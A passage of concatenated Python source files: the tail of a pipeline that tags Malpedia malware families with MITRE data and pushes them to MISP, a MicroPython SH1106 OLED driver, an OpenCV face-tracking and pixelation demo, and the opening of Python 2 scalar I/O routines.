        db.insert_tag(malwareUUID, "", iFamilyName, "MALWARE")
        # MALPEDIA TAGS
        db.insert_tag(malwareUUID, "Malpedia", commonName, "GALAXY", iFamilyName)
        # COMMON NAME OF MALWARE
        db.insert_tag(malwareUUID, "", commonName, "MALWARE")
        # COMMON NAME OF THIS THREAT ACTOR
        # NOTE(review): reads the gv._CURRENT_ACTOR_NAME_STR global, which holds
        # whichever actor was processed last by build_actor_malware_tree — it may
        # not be this family's actor; confirm intended.
        db.insert_tag(malwareUUID, "", gv._CURRENT_ACTOR_NAME_STR, "ACTOR")
        # SHORT NAME OF THIS THREAT ACTOR
        db.insert_tag(malwareUUID, "", threat_actor, "ACTOR")
        # MITRE
        # ----------------------------------------------------------------------------------
        # GET S CODE FROM COMMON NAME IN MITRE TABLE FOR SOFTWARE
        software_codes = []
        try:
            software_codes = db.get_mitre_software_code(commonName)
        except Exception:
            software_codes = []
        if gv._DEBUG:
            print("f(x) insertFamilyIntoDB: RETRIEVED MALWARE CODE FOR: {}".format(commonName))
        if software_codes:
            iMitreSCode = software_codes[0]["mitrecode"]
            mitre_tag = []
            if len(malwareFamilyMitreSoftwareTags) == 0:
                try:
                    malwareFamilyMitreSoftwareTags = db.get_galaxy_specific_tags(iMitreSCode, "malware")
                except Exception:
                    malwareFamilyMitreSoftwareTags = []
                if gv._DEBUG:
                    print("f(x) insertFamilyIntoDB: BUILT MITRE SOFTWARE TAGS FOR: {}".format(commonName))
            # GET/ INSERT SOFTWARE CAPABILIIES/TECHNIQUES FROM COMMON NAME OF SOFTWARE
            technique_list = []
            try:
                if gv._DEBUG:
                    print("f(x) insertFamilyIntoDB: GETTING MITRE MALWARE TECHNIQUE IDS")
                technique_list = mf.get_software_technique_ids_from_software_name(commonName)
            except Exception:
                technique_list = []
            for technique in technique_list:
                malwareFamilyMitreSoftwareTechniqueTags.append(db.get_galaxy_specific_tags(technique))
                if gv._DEBUG:
                    print("f(x) insertFamilyIntoDB: BUILT MITRE SOFTWARE TECHNIQUE TAGS FOR: {}".format(commonName))
        # TLP TAGS
        db.insert_tag(malwareUUID, "", "tlp:amber", "MALWARE")
        malwareFamilyAltNamesMitreSpecificTags.clear()
        altCount = 0
        # ALT NAMES FOR THIS FAMILY OF MALWARE
        for value in altNames:
            altCount += 1
            db.insert_tag(malwareUUID, "", value, "MALWARE")
            # GET S CODE FROM ALIASES MITRE TABLE FOR SOFTWARE
            software_codes = []
            try:
                software_codes = db.get_mitre_software_code(value)
            except Exception:
                software_codes = []
            if gv._DEBUG:
                print("f(x) insertFamilyIntoDB: RETRIEVED SOFTWARE CODES FOR: [{}]: {}".format(altCount, value))
            if software_codes:
                iMitreSCode = software_codes[0]["mitrecode"]
                mitre_tag = []
                try:
                    mitre_tag = db.get_galaxy_specific_tags(iMitreSCode, "malware")
                except Exception:
                    mitre_tag = []
                for tags in mitre_tag:
                    malwareFamilyAltNamesMitreSpecificTags.append(tags)
                if gv._DEBUG:
                    print("f(x) insertFamilyIntoDB: RETRIEVED SOFTWARE TAGS FOR: {}".format(value))
                knownTags = False
                j = 0
                mergeList = []
                # BUG FIX: the inner loop variable was also named "value",
                # shadowing the enclosing alt-name loop variable and corrupting
                # the technique lookup below; renamed to altTag.
                for altTag in malwareFamilyAltNamesMitreSpecificTags:
                    j += 1
                    b = 0
                    for tag in malwareFamilyMitreSoftwareTags:
                        b += 1
                        iTag = tag["tag"]
                        if gv._DEBUG:
                            print("f(x) insertFamilyIntoDB: COMPARING:[{}][{}] {}:{}".format(j, b, iTag, altTag["tag"]))
                        if altTag["tag"] == iTag:
                            knownTags = True
                            if gv._DEBUG:
                                print("f(x) insertFamilyIntoDB: TAGS ALREADY KNOWN FOR: [{}]:{}".format(altCount, altTag["tag"]))
                            break
                        else:
                            if gv._DEBUG:
                                print("f(x) insertFamilyIntoDB: UNKNOWN TAG: [{}]:{}".format(altCount, altTag["tag"]))
                            mergeList.append(tag)
                if knownTags == False:
                    # Fold the newly discovered tags into the family's set.
                    malwareFamilyMitreSoftwareTags += mergeList
                    malwareFamilyMitreSoftwareTechniqueTags.append(db.get_galaxy_specific_tags(iMitreSCode, "malware"))
                    if gv._DEBUG:
                        print("f(x) insertFamilyIntoDB: ADDING NEW DATA TAG: [{}]:{}".format(altCount, value))
                # GET/ INSERT SOFTWARE CAPABILIIES/TECHNIQUES FROM ALT NAMES OF SOFTWARE
                technique_list = []
                try:
                    technique_list = mf.get_software_technique_ids_from_software_name(value)
                except Exception:
                    technique_list = []
                if gv._DEBUG:
                    print("f(x) insertFamilyIntoDB: RETRIEVED TECHNIQUE IDS FOR: {}".format(value))
                for technique in technique_list:
                    malwareFamilyMitreSoftwareTechniqueTags.append(db.get_galaxy_specific_tags(technique))
                    if gv._DEBUG:
                        print("f(x) insertFamilyIntoDB: BUILT MITRE SOFTWARE TECHNIQUE TAGS FOR: {}".format(value))
        # ADD THE MITRE TECHNIQUE TAGS (lists of tag dicts, hence two levels)
        for tag in malwareFamilyMitreSoftwareTechniqueTags:
            for var in tag:
                iGalaxy = var["galaxy"]
                iTag = var["tag"]
                db.insert_tag(malwareUUID, iGalaxy, iTag, "GALAXY")
                db.insert_tag(threat_actor_UUID, iGalaxy, iTag, "GALAXY")
        # MITRE SOFTWARE ID
        mitre_tag = malwareFamilyMitreSoftwareTags
        # INSERT TAG WITH mitre-malware or GALAXY AS SOURCE
        for tag in mitre_tag:
            iGalaxy = tag["galaxy"]
            iTag = tag["tag"]
            db.insert_tag(malwareUUID, iGalaxy, iTag, "GALAXY")
            db.insert_tag(threat_actor_UUID, iGalaxy, iTag, "GALAXY")
    except Exception as e:
        exc_type, _, exc_tb = sys.exc_info()
        fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
        print("f(x) insertFamilyIntoDB: {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
        sys.exit(e)
# INSERT FAMILY SPECIFIC PATHS AND FILES IN DATABASE
def stagePathsAndFiles(iFamilyName=""):
    """Mirror one malware family's on-disk repository tree into the database.

    Walks every path under gv._MALPEDIA_REPOSITORY/<iFamilyName> (skipping
    yara and .json files), and for each path component below the configured
    directory depth inserts a parent/child row (type PATH or MALWARE),
    copies the family's tags onto the node and its parent, and adds
    TLP/VERSION/STATUS tags for specimen files.  Exits the process on any
    exception.
    """
    if gv._DEBUG:
        print("f(x) stagePathsAndFiles: ANALYZING MALWARE ON DISK")
    parentUUID = None
    searchDir = sorted(glob.glob(gv._MALPEDIA_REPOSITORY + iFamilyName + "/**/*", recursive=True))
    for path in searchDir:
        # WE DON'T WANT YARA OR JSON FILES
        if "yara" in path or ".json" in path:
            continue
        try:
            pathLen = len(path.split("/"))
            lstPath = path.split("/")
            currDirDepth = gv._CURRENT_DIR_DEPTH
            parentName = iFamilyName
            # Walk each path component below the repository root, inserting one
            # parent/child record per component.
            while currDirDepth < pathLen:
                if gv._DEBUG:
                    print("f(x) stagePathsAndFiles: ANALYZING PATH: {}".format(path))
                myName = lstPath[currDirDepth]
                stored_data = db.get_parent_child_data( iValue=myName)
                myUUID = ""
                myType = ""
                # Absolute path of the component currently being examined.
                myPath = "/"
                myPath = myPath.join(lstPath[0:currDirDepth+1])
                isFile = os.path.isfile(myPath)
                parentLookup = False
                # MALWARE FAMILY COMMON NAME AND UUID
                malwareFamilyMeta = db.get_family_meta(iName=iFamilyName)
                malwareFamilyUUID = malwareFamilyMeta["uuid"]
                if gv._DEBUG:
                    print("f(x) stagePathsAndFiles: ANALYZING: {}".format(myName))
                if not stored_data:
                    myUUID = str(uuid.uuid4())
                    parentLookup = True
                else:
                    stored_path = stored_data["path"]
                    # IN CASE SAME FILE IS UPLOADED TO MULTIPLE PLACES
                    if stored_path == myPath:
                        myUUID = stored_data["uuid"]
                        myType = stored_data["mytype"]
                        parentUUID = stored_data["parentuuid"]
                        parentName = stored_data["parentname"]
                    else:
                        # Same name, different location: treat as a new node.
                        myUUID = str(uuid.uuid4())
                        parentLookup = True
                myStatus = ""
                myVersion = ""
                myDate = ""
                parentType = ""
                if parentLookup == True:
                    parent_info = db.get_parent_child_data( iValue=parentName)
                    if parent_info:
                        parentUUID = parent_info["uuid"]
                        parentName = parent_info["name"]
                        if gv._DEBUG:
                            print("f(x) stagePathsAndFiles: PARENT FOUND: {}".format(parentName))
                # Components at the root depth hang off the FAMILY; deeper ones
                # hang off their containing PATH.
                if currDirDepth == gv._CURRENT_DIR_DEPTH:
                    parentType = "FAMILY"
                    if not isFile:
                        myType = "PATH"
                    else:
                        myType = "MALWARE"
                else:
                    parentType= "PATH"
                    if not isFile:
                        myType = "PATH"
                    else:
                        myType = "MALWARE"
                if gv._DEBUG:
                    print("f(x) stagePathsAndFiles: INSERTING PARENT CHILD DATA FOR: {}".format(myName))
                # INSERT PARENT CHILD RELATIONSHIP WITH META DATA
                db.insert_parent_child( myUUID, \
                                        parentUUID, \
                                        myName, \
                                        parentName, \
                                        isFile, \
                                        myPath, \
                                        myVersion, \
                                        myDate, \
                                        myType, \
                                        parentType
                                        )
                # ADD ALL TAGS FROM MALWARE FAMILY TO PATH AND SPECIMEN
                mitre_tags_for_self = db.copy_tags(iSourceUUID=malwareFamilyUUID, iDestinationUUID=myUUID)
                db.insert_tag(iIsList=True, iList=mitre_tags_for_self)
                # INSERT TAG WITH mitre-malware or GALAXY AS SOURCE
                if gv._DEBUG:
                    print("f(x) stagePathsAndFiles: DUPLICATING MALWARE FAMILY TAGS TO: {}".format(myName))
                if parentType != "FAMILY":
                    mitre_tags_for_parent = db.copy_tags(iSourceUUID=malwareFamilyUUID, iDestinationUUID=parentUUID)
                    db.insert_tag(iIsList=True, iList=mitre_tags_for_parent)
                    if gv._DEBUG:
                        print("f(x) stagePathsAndFiles: DUPLICATING MALWARE FAMILY TAGS TO: {}".format(parentName))
                if isFile == True:
                    myType = "MALWARE"
                    # NOTE(review): specimen name is truncated to 64 chars here —
                    # presumably a DB column limit; confirm against getSpecimenData.
                    myStatus, myVersion, _ = getSpecimenData(iFamilyName, myName[0:64])
                    if valid_date(myVersion):
                        myDate = myVersion
                    else:
                        myDate = datetime.date.today()
                    # ADD SPECIMEN AND PATH SPECIFIC TAGS
                    #TLP
                    db.insert_tag(myUUID, "", "tlp:amber", "MALWARE")
                    # VERSION
                    if myVersion != "":
                        if gv._DEBUG:
                            print("f(x) stagePathsAndFiles: INSERT TAG: SPECIMEN AND PATH [IF REQUIRED]: SPECIMEN VERSION: {}".format(myVersion))
                        db.insert_tag(myUUID, "", myVersion, "VERSION")
                    # STATUS
                    if myStatus != "":
                        if gv._DEBUG:
                            print("f(x) stagePathsAndFiles: INSERT TAG: SPECIMEN AND PATH [IF REQUIRED]: SPECIMEN STATUS: {}".format(myStatus))
                        db.insert_tag(myUUID, "", myStatus, "STATUS")
                else:
                    # Directories become the parent of the next component down.
                    parentUUID = myUUID
                    parentName = myName
                currDirDepth += 1
        except Exception as e:
            sys.exit(e)
def iterateStageAllFiles():
    """Stage paths/files for every malware family with a Malpedia JSON file.

    Scans gv._MALPEDIA_OUTPUT/malware/ for per-family JSON files (skipping
    any whose name contains "completed") and runs stagePathsAndFiles() on
    each family name.
    """
    path_to_malware_json = gv._MALPEDIA_OUTPUT + "malware/"
    malwareFamilies = []
    for name in glob.glob(path_to_malware_json + "*.json"):
        if "completed" not in name:
            # Derive the family name from the file's basename rather than a
            # hard-coded path-component index (the original used lstPath[7],
            # which breaks whenever the output directory sits at a different
            # depth in the filesystem).
            malwareName = os.path.basename(name)
            malwareFamilies.append(malwareName.replace(".json", ""))
    for oFamily in malwareFamilies:
        print("f(x) iterateStageAllFiles: STAGING DATA FOR SPECIMENS OF: {}".format(oFamily))
        stagePathsAndFiles(oFamily)
if __name__ == '__main__':
    # Pipeline entry point: initialize, pull Malpedia/MISP-galaxy data, stage
    # actors/families/specimens into the DB, then push events to MISP.
    # INITIALIZE GLOBAL VARIABLES
    print("f(x) INITIALIZE: INITIALIZE GLOBAL VARIABLES")
    if initGlobals() == 1:
        # Fixed typo: "enviroment" -> "environment".
        print("Critical environment variables not set. Normally this is done prior to running \"docker-compose up\" and in the .env file. Please refer to the readme file for proper configuration.")
        sys.exit(1)
    # UPDATE AND PUSH MISP GALAXIES INTO DATABASE FOR QUICK SEARCHING
    print("f(x) INITIALIZE: UPDATE AND PUSH MISP GALAXIES INTO DATABASE FOR QUICK SEARCHING")
    mgf.importMISPGalaxies()
    # DOWNLOAD UPDATED ACTOR JSON FILES FROM MALPEDIA
    print("f(x) INITIALIZE: DOWNLOAD UPDATED ACTOR JSON FILES FROM MALPEDIA")
    stageActorMalwareMeta()
    # DOWNLOAD UPDATED MALWARE JSON FILES FROM MALPEDIA
    print("f(x) INITIALIZE: DOWNLOAD UPDATED MALWARE JSON FILES FROM MALPEDIA")
    stageMalwareSpecimens()
    # STAGE AN UNATTRIBUTED (CATCHALL) MALWARE ACTOR AND ERROR ACTOR TO CATCH MALPEDIA ATTRIBUTION ERRORS.
    print("f(x) INITIALIZE: STAGE AN UNATTRIBUTED (CATCHALL) MALWARE ACTOR AND ERROR ACTOR TO CATCH MALPEDIA ATTRIBUTION ERRORS.")
    stageUnattributedActor()
    # STAGE KNOWN ACTORS AND FAMILIES
    print("f(x) INITIALIZE: STAGE KNOWN ACTORS AND FAMILIES")
    stageThreatActors()
    # STAGE FAMILIES
    print("f(x) INITIALIZE: STAGE FAMILIES")
    stageMalwareFamilies()
    # FINALLY STAGE MALWARE SPECIMENS TO INCLUDE ADDING PATHS TO THEM IN PARENT CHILD TABLE
    print("f(x) INITIALIZE: STAGE MALWARE SPECIMENS TO INCLUDE ADDING PATHS TO THEM IN PARENT CHILD TABLE")
    iterateStageAllFiles()
    # PUSH ACTORS TO MISP (dead `= set()` pre-assignments removed: each name
    # was immediately rebound by db.get_parent_child_data()).
    print("f(x) INITIALIZE: CREATING MISP ACTOR EVENTS")
    actorUUIDs = db.get_parent_child_data("actor")
    pushNewEventsIntoMisp(actorUUIDs, update=False)
    cf.wait(gv._THREAD_LIST)
    gv._THREAD_LIST = []
    # PUSH FAMILIES TO MISP
    print("f(x) INITIALIZE: CREATING MISP FAMILY EVENTS")
    familyUUIDs = db.get_parent_child_data("family")
    pushNewEventsIntoMisp(familyUUIDs, update=False)
    cf.wait(gv._THREAD_LIST)
    gv._THREAD_LIST = []
    # PUSH PATHS TO MISP
    print("f(x) INITIALIZE: CREATING MISP PATH EVENTS")
    pathUUIDs = db.get_parent_child_data("path")
    pushNewEventsIntoMisp(pathUUIDs, update=False)
    cf.wait(gv._THREAD_LIST)
    gv._THREAD_LIST = []
    # PUSH MALWARE TO MISP
    print("f(x) INITIALIZE: CREATING MISP MALWARE EVENTS")
    malwareUUIDs = db.get_parent_child_data("malware")
    pushNewEventsIntoMisp(malwareUUIDs, update=False)
    cf.wait(gv._THREAD_LIST)
    gv._THREAD_LIST = []
    # # SANITIZE AND CLEAN DATA
    # # EMPTY SSDEEP CORRELATIONS
    # print("f(x) INITIALIZE: REMOVING EMPTY SSDEEP CORRELATIONS AND TO IDS FLAGS FROM INVALID CORRELATIONS")
    # sf.removeFalsePositiveIDS()
    # cf.wait(gv._THREAD_LIST)
    # gv._THREAD_LIST = []
    # # PUBLISH ALL EVENTS
    # print("f(x) INITIALIZE: PUBLISHING ALL UNPUBLISHED")
    # sf.publishUnpublished()
    # cf.wait(gv._THREAD_LIST)
    # gv._THREAD_LIST = []
    print("INITIALIZATION COMPLETE")
|
<filename>components/py_engine/framework/sh1106.py
from micropython import const
import utime
import framebuf
from driver import SPI
from driver import GPIO
# a few register definitions (SH1106-specific command bytes)
_SET_CONTRAST = const(0x81)
_SET_NORM_INV = const(0xa6)
_SET_DISP = const(0xae)
_SET_SCAN_DIR = const(0xc0)
_SET_SEG_REMAP = const(0xa0)
_LOW_COLUMN_ADDRESS = const(0x00)
_HIGH_COLUMN_ADDRESS = const(0x10)
_SET_PAGE_ADDRESS = const(0xB0)
# register definitions (shared with SSD1306-style init sequence)
SET_CONTRAST = const(0x81)
SET_ENTIRE_ON = const(0xa4)
SET_NORM_INV = const(0xa6)
SET_DISP = const(0xae)
SET_MEM_ADDR = const(0x20)
SET_COL_ADDR = const(0x21)
SET_PAGE_ADDR = const(0x22)
SET_DISP_START_LINE = const(0x40)
SET_SEG_REMAP = const(0xa0)
SET_MUX_RATIO = const(0xa8)
SET_COM_OUT_DIR = const(0xc0)
SET_DISP_OFFSET = const(0xd3)
SET_COM_PIN_CFG = const(0xda)
SET_DISP_CLK_DIV = const(0xd5)
SET_PRECHARGE = const(0xd9)
SET_VCOM_DESEL = const(0xdb)
SET_CHARGE_PUMP = const(0x8d)
# NOTE(review): original (Chinese) comment read "dc sync, try with led".
class SH1106:
    """Framebuffer-backed driver core for SH1106 OLED displays.

    Transport-agnostic: subclasses supply write_cmd()/write_data()/reset().
    NOTE(review): the base-class reset() takes a `res` pin argument but
    init_display() calls self.reset() with no args, so this class only works
    through a subclass that overrides reset() (as SH1106_I2C/SH1106_SPI do)
    — confirm before instantiating SH1106 directly.
    """
    def __init__(self, width, height, external_vcc):
        # Display geometry; the buffer holds one bit per pixel, 8 rows per page.
        self.width = width
        self.height = height
        self.external_vcc = external_vcc
        self.pages = self.height // 8
        self.buffer = bytearray(self.pages * self.width)
        fb = framebuf.FrameBuffer(self.buffer, self.width, self.height, framebuf.MVLSB)
        self.framebuf = fb
        # set shortcuts for the methods of framebuf
        self.fill = fb.fill
        self.fill_rect = fb.fill_rect
        self.hline = fb.hline
        self.vline = fb.vline
        self.line = fb.line
        self.rect = fb.rect
        self.pixel = fb.pixel
        self.scroll = fb.scroll
        # self.text = fb.text
        self.blit = fb.blit
        print("init done")
        self.init_display()
    def init_display(self):
        """Reset the panel, send the init command sequence, and show a full frame."""
        self.reset()
        for cmd in (
            SET_DISP | 0x00, # display off
            SET_DISP_CLK_DIV, 0x80, # set display clock divide ratio
            SET_MUX_RATIO, self.height - 1, # set multiplex ratio (default 0x3F, 1/64 duty)
            SET_DISP_OFFSET, 0x00, # set display offset (default 0)
            SET_DISP_START_LINE | 0x00, # set display start line [5:0]
            SET_CHARGE_PUMP, 0x14, # charge pump setting, bit2 on/off
            SET_MEM_ADDR, 0x02, # memory addressing mode [1:0]: 00 column; 01 row; 10 page (default)
            SET_SEG_REMAP | 0x01, # segment remap, bit0: 0 -> col 0; 1 -> col 127
            SET_COM_OUT_DIR | 0x08, # COM scan direction; bit3: 0 normal; 1 remapped COM[N-1]->COM0 (N = mux ratio)
            SET_COM_PIN_CFG, 0x12, # COM pins hardware configuration [5:4]
            SET_PRECHARGE, 0xf1, # pre-charge period: [3:0] phase 1; [7:4] phase 2
            SET_VCOM_DESEL, 0x30, # VCOMH deselect level [6:4]: 000=0.65*Vcc; 001=0.77*Vcc; 011=0.83*Vcc
            SET_CONTRAST, 0xff, # contrast (default 0x7F; range 1-255, higher is brighter)
            SET_ENTIRE_ON, # entire display on; bit0: 1 on; 0 follow RAM
            SET_NORM_INV, # normal/inverse display; bit0: 1 inverse; 0 normal
            SET_DISP | 0x01): # display on
            self.write_cmd(cmd)
        self.fill(1)
        self.show()
    def poweroff(self):
        """Turn the display panel off (framebuffer contents are kept)."""
        self.write_cmd(_SET_DISP | 0x00)
    def poweron(self):
        """Turn the display panel back on."""
        self.write_cmd(_SET_DISP | 0x01)
    def rotate(self, flag, update=True):
        """Rotate the display 180 degrees when flag is truthy."""
        if flag:
            self.write_cmd(_SET_SEG_REMAP | 0x01) # mirror display vertically
            self.write_cmd(_SET_SCAN_DIR | 0x08) # mirror display hor.
        else:
            self.write_cmd(_SET_SEG_REMAP | 0x00)
            self.write_cmd(_SET_SCAN_DIR | 0x00)
        if update:
            self.show()
    def sleep(self, value):
        # value truthy -> display off (0xAE); falsy -> display on (0xAF).
        self.write_cmd(_SET_DISP | (not value))
    def contrast(self, contrast):
        """Set panel contrast (0-255)."""
        self.write_cmd(_SET_CONTRAST)
        self.write_cmd(contrast)
    def invert(self, invert):
        """Invert (1) or normalize (0) pixel polarity."""
        self.write_cmd(_SET_NORM_INV | (invert & 1))
    def show(self):
        """Push the framebuffer to the panel, one 8-row page at a time."""
        for page in range(self.height // 8):
            self.write_cmd(_SET_PAGE_ADDRESS | page)
            self.write_cmd(_LOW_COLUMN_ADDRESS)
            self.write_cmd(_HIGH_COLUMN_ADDRESS)
            # Copy this page's bytes into a contiguous buffer for one write.
            page_buffer = bytearray(self.width)
            for i in range(self.width):
                page_buffer[i] = self.buffer[self.width * page + i]
            self.write_data(page_buffer)
    def reset(self, res):
        """Pulse the reset pin: high 1ms, low 20ms, high 20ms."""
        if res is not None:
            res.write(1)
            utime.sleep_ms(1)
            res.write(0)
            utime.sleep_ms(20)
            res.write(1)
            utime.sleep_ms(20)
class SH1106_I2C(SH1106):
    """SH1106 driver speaking over an I2C bus."""
    def __init__(self, width, height, i2c, res=None, addr=0x3c,
                 external_vcc=False):
        self.i2c = i2c
        self.addr = addr
        self.res = res
        # Reusable 2-byte scratch buffer: [control byte, command byte].
        self.temp = bytearray(2)
        if res is not None:
            res.init(res.OUT, value=1)
        super().__init__(width, height, external_vcc)
    def write_cmd(self, cmd):
        """Send one command byte (control byte 0x80: Co=1, D/C#=0)."""
        scratch = self.temp
        scratch[0] = 0x80
        scratch[1] = cmd
        self.i2c.writeto(self.addr, scratch)
    def write_data(self, buf):
        """Send framebuffer bytes prefixed with the 0x40 data control byte."""
        self.i2c.writeto(self.addr, b'\x40' + buf)
    def reset(self):
        """Pulse the reset pin configured at construction time."""
        super().reset(self.res)
class SH1106_SPI(SH1106):
    """SH1106 driver speaking over SPI with a D/C pin and optional CS pin."""
    def __init__(self, width, height, spi, dc, res=None, cs=None,
                 external_vcc=False):
        self.spi = spi
        self.dc = dc
        self.res = res
        self.cs = cs
        super().__init__(width, height, external_vcc)
    def _transfer(self, payload, is_data):
        # D/C# low selects command mode, high selects data mode.  When a CS
        # pin is present, frame the transfer with CS high/low/high.
        level = 1 if is_data else 0
        if self.cs is not None:
            self.cs.write(1)
            self.dc.write(level)
            self.cs.write(0)
            self.spi.write(payload)
            self.cs.write(1)
        else:
            self.dc.write(level)
            self.spi.write(payload)
    def write_cmd(self, cmd):
        """Send one command byte."""
        self._transfer(bytearray([cmd]), False)
    def write_data(self, buf):
        """Send framebuffer bytes."""
        self._transfer(buf, True)
    def reset(self):
        """Pulse the reset pin configured at construction time."""
        super().reset(self.res)
    def test(self):
        """Visual smoke test: alternate all-on / all-off frames forever."""
        while True:
            self.fill(1)
            self.show()
            self.fill(0)
            self.show()
|
#Import the OpenCV and dlib libraries
import cv2
import dlib
#Initialize a face cascade using the frontal face haar cascade provided with
#the OpenCV library
faceCascade = cv2.CascadeClassifier('xmls/haarcascade_frontalface_alt.xml')
#The desired output width and height of the display windows
OUTPUT_SIZE_WIDTH = 775
OUTPUT_SIZE_HEIGHT = 600
# Downscale factor used to pixelate (mosaic) the tracked face region.
MOSAIC_RATE = 10
def detectAndTrackLargestFace():
    """Track the largest webcam face with dlib and pixelate it live.

    Detects faces with the Haar cascade, hands the largest one to a dlib
    correlation tracker, draws its bounding box in one window and a
    mosaic (pixelated) version of the face in another.  Runs until the
    user presses 'Q' or hits Ctrl-C in the console.
    """
    #Open the first webcam device
    capture = cv2.VideoCapture(0)
    #Create three opencv named windows
    cv2.namedWindow("base-image", cv2.WINDOW_AUTOSIZE)
    cv2.namedWindow("result-image", cv2.WINDOW_AUTOSIZE)
    cv2.namedWindow("mosaic-image", cv2.WINDOW_AUTOSIZE)
    #Position the windows next to each other
    cv2.moveWindow("base-image",0,0)
    cv2.moveWindow("result-image",400,0)
    cv2.moveWindow("mosaic-image",0,400)
    #Start the window thread for the windows we are using
    cv2.startWindowThread()
    #Create the tracker we will use
    tracker = dlib.correlation_tracker()
    #The variable we use to keep track of the fact whether we are
    #currently using the dlib tracker
    trackingFace = 0
    #The color of the rectangle we draw around the face
    rectangleColor = (0,165,255)
    try:
        while True:
            #Retrieve the latest image from the webcam
            rc,fullSizeBaseImage = capture.read()
            #Resize the image to 320x240
            baseImage = cv2.resize( fullSizeBaseImage, ( 320, 240))
            #Check if a key was pressed and if it was Q, then destroy all
            #opencv windows and exit the application
            if cv2.waitKey(1) & 0xFF == ord('Q') :
                quit()
            #Result image is the image we will show the user, which is a
            #combination of the original image from the webcam and the
            #overlayed rectangle for the largest face
            resultImage = baseImage.copy()
            mosaicImage = baseImage.copy()
            #If we are not tracking a face, then try to detect one
            if not trackingFace:
                #The haar detector needs a gray-scale image
                gray = cv2.cvtColor(baseImage, cv2.COLOR_BGR2GRAY)
                faces = faceCascade.detectMultiScale(gray, 1.3, 5)
                print("Using the cascade detector to detect face")
                #We only track the 'largest' face, by rectangle area.
                #The int() casts are required because dlib's tracker
                #rejects numpy.int32 coordinates.
                maxArea = 0
                x = 0
                y = 0
                w = 0
                h = 0
                for (_x,_y,_w,_h) in faces:
                    if _w*_h > maxArea:
                        x = int(_x)
                        y = int(_y)
                        w = int(_w)
                        h = int(_h)
                        maxArea = w*h
                #If one or more faces are found, initialize the tracker
                #on the largest face in the picture
                if maxArea > 0 :
                    #Initialize the tracker with a small margin around the face
                    tracker.start_track(baseImage,
                                        dlib.rectangle( x-10,
                                                        y-20,
                                                        x+w+10,
                                                        y+h+20))
                    #Set the indicator variable such that we know the
                    #tracker is tracking a region in the image
                    trackingFace = 1
            #Check if the tracker is actively tracking a region in the image
            if trackingFace:
                #Update the tracker and request information about the
                #quality of the tracking update
                trackingQuality = tracker.update(baseImage)
                #If the tracking quality is good enough, determine the
                #updated position of the tracked region and draw the
                #rectangle
                if trackingQuality >= 5.5:
                    tracked_position = tracker.get_position()
                    t_x = int(tracked_position.left())
                    t_y = int(tracked_position.top())
                    t_w = int(tracked_position.width())
                    t_h = int(tracked_position.height())
                    cv2.rectangle(resultImage, (t_x, t_y),
                                  (t_x + t_w , t_y + t_h),
                                  rectangleColor ,2)
                    #Clamp the tracked box to the 320x240 frame.  (The
                    #original kept the full width/height even when the box
                    #started off-screen, shifting the mosaic region.)
                    m_x = max(t_x, 0)
                    m_y = max(t_y, 0)
                    m_w = min(t_x + t_w, 320) - m_x
                    m_h = min(t_y + t_h, 240) - m_y
                    print("MOSAIC", m_x, m_y, m_w, m_h)
                    #Only mosaic when the clamped box is non-empty; a box
                    #fully outside the frame would make cv2.resize throw.
                    if m_w > 0 and m_h > 0:
                        face_img = mosaicImage[m_y:m_y + m_h, m_x:m_x + m_w]
                        #Shrink then re-enlarge to pixelate.  max(1, ...)
                        #keeps cv2.resize from receiving a zero dimension
                        #for faces smaller than MOSAIC_RATE pixels.
                        face_img = cv2.resize(face_img,
                                              (max(1, m_w // MOSAIC_RATE),
                                               max(1, m_h // MOSAIC_RATE)))
                        face_img = cv2.resize(face_img, (m_w, m_h), interpolation=cv2.INTER_AREA)
                        mosaicImage[m_y:m_y + m_h, m_x:m_x + m_w] = face_img
                else:
                    #If the quality of the tracking update is not
                    #sufficient (e.g. the tracked region moved out of the
                    #screen) we stop the tracking of the face and in the
                    #next loop we will find the largest face in the image
                    #again
                    trackingFace = 0
            #Since we want to show something larger on the screen than the
            #original 320x240, we resize the image again
            #
            #Note that it would also be possible to keep the large version
            #of the baseimage and make the result image a copy of this large
            #base image and use the scaling factor to draw the rectangle
            #at the right coordinates.
            largeResult = cv2.resize(resultImage,
                                     (OUTPUT_SIZE_WIDTH,OUTPUT_SIZE_HEIGHT))
            mosaicResult = cv2.resize(mosaicImage,
                                      (OUTPUT_SIZE_WIDTH,OUTPUT_SIZE_HEIGHT))
            #Finally, we want to show the images on the screen
            cv2.imshow("base-image", baseImage)
            cv2.imshow("result-image", largeResult)
            cv2.imshow("mosaic-image", mosaicResult)
    #To ensure we can also deal with the user pressing Ctrl-C in the console
    #we have to check for the KeyboardInterrupt exception and destroy
    #all opencv windows and exit the application
    except KeyboardInterrupt as e:
        cv2.destroyAllWindows()
        exit(0)
# Run the demo when executed as a script (requires a webcam at index 0).
if __name__ == '__main__':
    detectAndTrackLargestFace()
#!/usr/bin/python -Wall
# ================================================================
# <NAME>
# <EMAIL>
# 2005-06-08
#
# Some simple I/O routines for real and complex scalars, vectors,
# and matrices.
# ================================================================
from __future__ import division # 1/2 = 0.5, not 0.
import sys
import copy
import re
# ================================================================
def complex_scalar_from_string(orig_line, lno):
	"""Parse one complex scalar from a text line (Python 2 module).

	The line holds either two whitespace-separated floats (real, imag) or
	a single float (imaginary part 0).  *lno* is used only in error
	messages.  Exits the process on empty or unparseable input.
	NOTE(review): line[-1] raises IndexError on an empty orig_line; the
	readers in this file stop at EOF before passing "" — confirm callers.
	"""
	zre = 0
	zim = 0
	line = copy.copy(orig_line)
	# Chomp trailing newline, if any.
	if (line[-1] == '\n'):
		line = line[0:-1]
	# Strip leading and trailing whitespace.
	line = re.sub(r"^\s+", r"", line)
	line = re.sub(r"\s+$", r"", line)
	if (line == ""):
		print >> sys.stderr, "pyrcio_m: empty input at line", lno
		sys.exit(1)
	# Tokenize.
	strings = re.split(r"\s+", line)
	if (len(strings) == 2):
		zre = float(strings[0])
		zim = float(strings[1])
	elif (len(strings) == 1):
		zre = float(strings[0])
	else:
		print >> sys.stderr, "pyrcio_m: unrecognizable input at line", lno
		sys.exit(1)
	return zre + zim*1j
# ----------------------------------------------------------------
def real_scalar_from_string(orig_line, lno):
	"""Parse one real scalar (a single float token) from a text line.

	*lno* is used only in error messages.  Exits the process on empty or
	multi-token input.
	"""
	z = 0
	line = copy.copy(orig_line)
	# Chomp trailing newline, if any.
	if (line[-1] == '\n'):
		line = line[0:-1]
	# Strip leading and trailing whitespace.
	line = re.sub(r"^\s+", r"", line)
	line = re.sub(r"\s+$", r"", line)
	if (line == ""):
